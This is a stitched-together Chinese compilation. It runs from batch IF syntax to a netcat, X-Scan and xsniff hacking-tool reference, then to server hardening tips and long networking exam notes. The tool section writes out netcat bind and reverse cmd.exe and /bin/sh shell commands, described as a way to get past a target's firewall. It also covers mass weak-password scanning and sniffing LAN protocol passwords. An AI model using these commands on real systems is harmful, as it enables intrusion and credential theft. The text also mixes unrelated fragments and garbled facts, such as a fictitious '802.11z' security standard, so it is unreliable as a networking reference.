IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：
-h 查看帮助信息
-d 后台模式
-e prog程序重定向，一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式，用于入站连接
-L 监听模式，连接天闭后仍然继续监听，直到CTR+C
-n IP地址，不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出，用-vv将更详细
-w数字 timeout延时间隔
-z 将输入，输出关掉（用于扫锚时）
基本用法：
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法：
nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用：nc -l -p 本机端口
在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注：
| 管道命令
< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中
>与>>的区别 ">"指：覆盖；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

#8 八：

2、扫锚工具：xscan.exe

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe

㈦ 如何配置网络服务器安全

1、安装补丁程序任何操作系统都有漏洞，作为网络系统管理员就有责任及时地将“补丁”打上。大部分中小企业服务器使用的是微软的
Windows2000/2003操作系统，因为使用的人特别多，所以发现的Bug也比较多，同时，蓄意攻击它们的人也很多。微软公司为了弥补操作系统的
安全漏洞，在其网站上提供了许多补丁，可以到网上下载并安装相关升级包。对于Windows2003，至少要升级到SP1，对于Windows2000，
至少要升级至ServicePack2。
2、安装和设置防火墙现在有许多基于硬件或软件的防火墙，如华为、神州数码、联想、瑞星等厂商的产品。对于企业内
部网来说，安装防火墙是非常必要的。防火墙对于非法访问具有很好的预防作用，但是并不是安装了防火墙之后就万事大吉了，而是需要进行适当的设置才能起作
用。如果对防火墙的设置不了解，需要请技术支持人员协助设置。
3、安装网络杀毒软件现在网络上的病毒非常猖獗，这就需要在网络服务器上安装网络版的杀毒软
件来控制病毒的传播，目前，大多数反病毒厂商(如瑞星、冠群金辰、趋势、赛门铁克、熊猫等)都已经推出了网络版的杀毒软件。同时，在网络版的杀毒软件使用
中，必须要定期或及时升级杀毒软件。
4、账号和密码保护账号和密码保护可以说是系统的第一道防线，目前网上的大部分对系统的攻击都是从截获或猜测密码开始
的。一旦黑客进入了系统，那么前面的防卫措施几乎就没有作用，所以对服务器系统管理员的账号和密码进行管理是保证系统安全非常重要的措施。
5、监测系统日
志通过运行系统日志程序，系统会记录下所有用户使用系统的情形，包括最近登录时间、使用的账号、进行的活动等。日志程序会定期生成报表，通过对报表进行分
析，你可以知道是否有异常现象。
6、关闭不需要的服务和端口服务器操作系统在安装的时候，会启动一些不需要的服务，这样会占用系统的资源，而且也增加
了系统的安全隐患。对于假期期间完全不用的服务器，可以完全关闭;对于假期期间要使用的服务器，应关闭不需要的服务，如Telnet等。另外，还要关掉没
有必要开的TCP端口。
7、定期对服务器进行备份为防止不能预料的系统故障或用户不小心的非法操作，必须对系统进行安全备份。除了对全系统进行每月一次的
备份外，还应对修改过的数据进行每周一次的备份。

㈧ 怎样进行路由器的安全设置

无线网络WiFi安全的设置方法：

1.打开电脑的wifi，搜索路由器默认wifi名（路由器背面铭牌有写），连接wifi网络。

㈨ 计算机网络中有哪些安全设置

1、对于计算机的网络安全可以加强和更新计算机中的防火墙来增加相应的系数，点击——控制面板——系统和安全。

㈩ 良好的网络设备安全配置管理原则

网络配置与管理
第一章
1. 计算机技术与通讯技术的紧密结合产生了计算机网络。它经历了三个阶段的发展过程：
具有通信功能的单机系统、具有通信功能的多机系统和计算机网络。
2. 计算机网络按逻辑功能分为资源子网和通信子网两部分。
资源子网是计算机网络中面向用户的部分，负责数据处理工作。
通信子网是网络中数据通信系统，它用于信息交换的网络节点处理机和通信链路组成，主要负责通信处理工作。
3. 网络设备，在现代网络中，依靠各种网络设备把各个小网络连接起来，形成了一个更大的网络，也就是Internet。网络设备主要包括：网卡（NIC）、调制解调器（Modem）、集线器（Hub）、中继器（Repeater）、网桥（Bridge）、交换机（Switch）、路由器（Router）和网关（Gateway）等。
4. 集线器是一种扩展网络的重要设备，工作在物理层。中继器工作在物理层，是最简单的的局域网延伸设备，主要作用是放大传输介质上传输的信号。网桥，工作在数据链路层，用于连接同类网络。交换机分为二层交换机和三层交换机，二层工作在数据链路层，根据MAC地址转发帧。三层交换机工作在网络层，根据网络地址转发数据包。每个端口都有桥接功能，所有端口都是独立工作的，连接到同一交换机的用户独立享受交换机每个端口提供的带宽，因此用交换机来扩展网络的时候，不会出现网络性能恶化的情况，这是目前使用最多的网络扩展设备。路由器，工作在网络层，它的作用是连接局域网和广域网。网关工作在应用层。
5. 传输介质，可分为有线传输介质和无线传输介质。
6. 计算机网络的分类，根据地理范围可以分为局域网（LAN）、城域网（MAN）、广域网（WAN）、和互联网（Internet）4种。
7. 局域网的分类，局域网主要是以双绞线为传输介质的以太网，基本上是企业和事业的局域网。
8. 以太网分为标准以太网，快速以太网，千兆以太网和10G以太网。
9. 令牌环网，在一种专门的帧称为“令牌”，在环路上持续地传输来确定一个结点何时可以发送包。
10. FDDI网，光纤分布式数据接口。同IBM的令牌环网技术相似，并具有LAN和令牌环网所缺乏的管理、控制和可靠性措施。
11. ATM网，异步传输模式，ATM使用53字节固定长度的单元进行交换。ATM的优点：使用相同的数据单元，可实现广域网和局域网的无缝连接。支持VLAN（虚拟局域网）功能，可以对网络进行灵活的管理和配置。具有不同的速率，分为25、51、155、622Mbps，从而为不同的应用提供不同的速率。ATM采用“信元交换”来代替“包交换”进行实验，发现信元交换的速度是非常快的。
12. 无线局域网，所采用的是802.11系列标准，它也是由IEEE 802标准委员会制定的。目前一系列标准主要有4个标准：802.11b 802.11a 802.11g 802.11z，前三个标准都是针对传输速度进行的改进。802.11b，它的传输速度为11MB/S，因为它的连接速度比较低，随后推出了802.11a标准，它的连接速度可达54MB/S。但由于两者不兼容，所以推出了802.11g，这样原有的802.11b和802.11a标准的设备都可以在同一网络中使用。802.11z是一种专门为了加强无线局域网安全的标准。因为无线局域网的“无线”特点，给网络带来了极大的不安全因素，为此802.11z标准专门就无线网络的安全做了明确规定，加强了用户身份认证制度，并对传输的数据进行加密。
13. 网络协议的三要素为：语法，语义，同步。
14. OSI参考模型是计算机网络的基本体系结构模型，通常使用的协议有：TCP/IP协议、IPX/SPX协议、NetBEUI协议等。
15. OSI模型将通信会话需要的各种进程划分7个相对独立的功能层次，从下到上依次是：物理层 数据链路层 网络层 传输层 会话层 表示层 应用层。
16. TCP/IP参考模型包括4个功能层：应用层 传输层 网际层及接口层
17. 协议组件 IP：网络层协议。 TCP:可靠的主机到主机层协议。 UDP：尽力转发的主机到主机层协议。 ICMP：在IP网络内为控制、测试、管理功能而设计的多协议。
18. IP地址介绍，地址实际上是一种标识符，它能够帮助找到目的站点，起到了确定位置的作用。IP 地址分为A B C DE类地址。
19. IP地址的使用规则：
20. 网络号全0的地址保留，不能作为标识网络使用。主机号全0的地址保留，用来标识网络地址。
网络号全1、主机号全0的地址代表网络的子网掩码。
地址0.0.0.0：表示默认路由。
地址255.255.255.255：代表本地有限广播。
主机号全1的地址表示广播地址，称为直接广播或是有限广播。可以跨越路由器。
21. 划分子网后整个IP地址就分为三个部分：主网号，它对应于标准A,B,C类的网络号部分。借用主机位作为网络号的部分，这个被称为子网号。剩余的主机号。
22. 子网掩码的意义，在掩码中，用1表示网络位，用0表示主机位。
23. IPV4地址不够用了，所以出现了IPV6地址。，在表示和书写时，用冒号将128位分割成8个16位的段，这里的128位表示在一个IPV6地址中包括128个二进制数，每个段包括4位的16进制数字。
第二章
1. 路由器是一种网络连接设备，用来连接不同的网络以及接入Internet。
IOS是路由器的操作系统，是路由器软件商的组成部分。
2. 路由器和PC机一样，也需要操作系统才能运行。Cisco（思科）路由器的操作系统叫做IOS，路由器的平台不同、功能不同，运行的IOS也不相同。IOS是一个特殊格式的文件，对于IOS文件的命名，思科采用了特殊的规则。
4. 网络互连：把自己的网络同其他的网络互连起来，从网络中获取更多的信息和向网络发布自己的消息。网络互连有多种方式，其中执行最多是网桥互连和路由器互连。
5. 路由动作包括两项基本内容：寻径和转发。寻径：判断到达目的地的最佳路径，由路由器选择算法来实现。
6. 路由选择方式有两种：静态路由和动态路由。
7．RIP协议最初是为Xerox网络系统的Xerox parc通用协议设计的，是Internet中常用的路由协议。RIP采用距离向量算法，也称为距离向量协议。 RIP执行非常广泛，它简单，可靠，便于配置。
8．ROP已不能互连，OSPF随机产生。它是网间工程任务组织的内部网关协议工作组为IP网络而开发的一种路由协议。是一种基于链路状态的路由协议。
9.BGP是为TCP/IP互联网设计的外部网关协议，用于多个自治域之间。
10．路由表的优先问题，它们各自维护的路由表都提供给转发程序，但这些路由表的表项间可能会发生冲突。这种冲突可通过配置各路由表的优先级来解决。通常静态路由具有默认的最高优先级，当其他路由表项与它矛盾时，均按静态路由转发。
11. 路由算法有一下几个设计目标：最优化 简洁性 快速收敛性灵活性坚固性
路由算法执行了许多种不同的度量标准去决定最佳路径。
通常所执行的度量有：路径长度。可靠性，时延。带宽。负载通信成本等。
第三章
进入快速以太网接口配置模式命令：Router（Config）#Interface Fasterthernet interface-number
配置IP地址及其掩码的命令：Router（Config-if）#ip address ip-address ip-mask【secondary】
启用接口的命令：Router（Config）#no shutdown
进入接口SO配置模式：Router1（config）#interface serial 0
配置路由器接口SO的IP地址：Router1(config-if)#ip address 172.16.2.1255.255.255.0
配置Router1的时钟频率（DCE）:Router1（config-if）#clock rate 64000
开启路由器fastetherner0接口：Router1（config）#no shutdown
第四章
静态路由的优点：1.没有额外的路由器的cpu负担2.节约带宽3.增加安全性
静态路由的缺点：1.网络管理员必须了解网络的整个拓扑结构
2.如果网络拓扑发生变化，管理员要在所有的路由上动手修改路由表
3.不适合于大型网络
默认路由是在路由选择表中没有对应于特定目标网络的条目是使用的路由
华为路由器配置默认路由：【RunterC】ip route-static 0. 0.0.0.0.0.0.0 192.168.40.1
静态路由的默认管理距离：1
目前使用的动态路由协议又两种：内部网关协议（IGP）和外部网关协议（RGP）
三种路由协议：距离矢量（Distance vector），链路状态（Link state）和混合型（Hybrid）
RIP目前有两个版本：RIPv1和RIPv2。RIPv1是个有类路由协议，而RIPv2是个无类路由协议
路由更新计时为：30秒 路由无效计时为：180秒保持停止计时为：大于等于180秒 路由刷新时间：240秒
复合度量包括4个元素：带宽、延迟、负载、可靠性
访问控制列表（ACL）是应用路由器接口的指令列表，这些指令列表用来告诉路由器哪些数据包可以接收，哪些数据包需要拒绝
ACL通过在访问控制列表中对目的地进行归类来管理通信流量，处理特定的数据包
ACL适用于所有的路由协议，如IP,IPX等
设置ACL的一些规则：
1. 按顺序地比较，先比较第一行，再比较第二行，直到最后一行
2. 从第一行起，直到一个符合条件的行，符合以后，其余的行就不再继续比较下去
3. 默认在每个ACL中最后一行为隐含的拒绝，如果之前没找到一条许可语句，意味着包将被丢弃
两种主要的访问控制列表：1.标准访问控制列表2.扩展访问控制列表
ACL号为1-99和1300-1999
扩展ACL使用的数字表号在100-199之间
第五章
交换机对数据包的转发是建立在MAC地址基础上
冗余路径带来的问题：广播风暴、重复帧拷贝、MAC地址表表项不稳定
STP（生成树协议）的主要任务是防止2层的循环，STP使用生成树算法（STA）来创建拓扑数据库
IEEE版本的STP的默认优先级是32768，决定谁是根桥。假如优先级一样，那就比较MAC地址，MAC地址小的作为根桥
运行STP的交换机端口的5中状态：堵塞、监听、学习、禁用、转发
交换机对于数据的转发有一下三种方式：1.存储-转发式交换方 2.直通式交换方式 3.消除片断式交换方式
可堆叠交换机就是指一个交换机中一般同时具有UP和DOWN堆叠端口
可堆叠交换机常用的堆叠方式有两种：菊花型和星型
SVI端口的配置第三层逻辑接口称为：SVI P168
交换环境中的两种连接类型：access links、trunk links
附加VLAN 信息的方法，最具代表性的有：Inter-Switch link（ISL）、IEEE 802.1Q(俗称dot 1 Q)
当出现违反端口安全原则的情况时，端口有一下几种措施：
Suspend（挂起）：端口不再工作，直到有数据帧流入并带有合法的地址
Disable（禁用）：端口不再工作，除非人工使其再次启用
Ignore（忽略）：忽略其违反安全性，端口仍可工作
计算机网络按逻辑功能可分为资源子网和通信子网两部分
网卡工作在网络模型的物理层
集线器是多端口中继器，工作在网络模型的物理层，所有端口共享设备
宽带
中继器工作在网络模型的物理层，是局域网的延伸设备。
网桥工作在网络模型的数据链路层，用于连接同类网络
交换机工作在网络模型的数据链路层，根据MAC地址转发数据帧，每个端口
独占宽带。
路由器工作在网络模型的网络层，根据IP地址转发数据包。
网关
网络有线通信介质通常包括双绞线、同轴电缆、光缆等
计算机网络按地里范围可以分为LAN、MAN、WAN、INTERNET
标准以太网宽带为10Mbps,实用CSMA/CD的访问控制方法，遵循
IEEE802.3标准，使用双绞线和同轴电缆为介质
10Base-5，使粗同轴电缆，最大网段长度500M，基带传输
10Base-2，使细同轴电缆，最大网段长度185M，基带传输
10Base-T，使双绞线，最大网段长度100M
快速以太网宽带为100Mbps，使用CSMA/CD的访问控制方法，使用双绞线
和光纤
100Base-TX，使双绞线，使用2对线路传输信号
100Base-T4，使双绞线，使用4对线路传输信号
100Base-FX，使用光纤，使用4B/5B编码方式
令牌环网，使用专门的数据帧称为令牌，传送数据
FDDI光纤分布式数据接口，使用光纤为传输介质，采用令牌传递数据
ATM异步传输模式使用53字节固定长度的信元传输数据
无线局域网WLAN采用802.11系列标准，有802.11a、802.11b、802.11g、
802.11n、802.11z
网络协议是计算机网络体系结构中关键要素之一，它的三要素为：语法、
语义、同步
TCP/IP中文为传输控制协议/互联网协议，是internet的基础协议，使用IP
地址通信
IPX/SPX中文为NetBIOS增强用户接口，特点是简单、通信效率高的广播型协
议
OSI参考模型七层：物理层、数据链路层、网络层、传输层、会话层、表示
层、应用层
物理层：传送单位是比特流，定义物理特性
数据链路层：传送单位是数据帧，确保链路连接
网络层：传送单位是数据包，提供网间通信
传输层：传送单位是信息，提供端到端的可靠传输
会话层：管理通信双发会话
表示层：负责数据编码转换
应用层：提供应用服务接口
TCP/IP模型四层：网络接口层、网际层、传输层、应用层
应用层协议：Telnet、FTP、SMTP、HTTP等 传输层协议：TCP、UDP
网际层协议：IP、ICMP、IGMP
网络接口层协议：ARP、RARP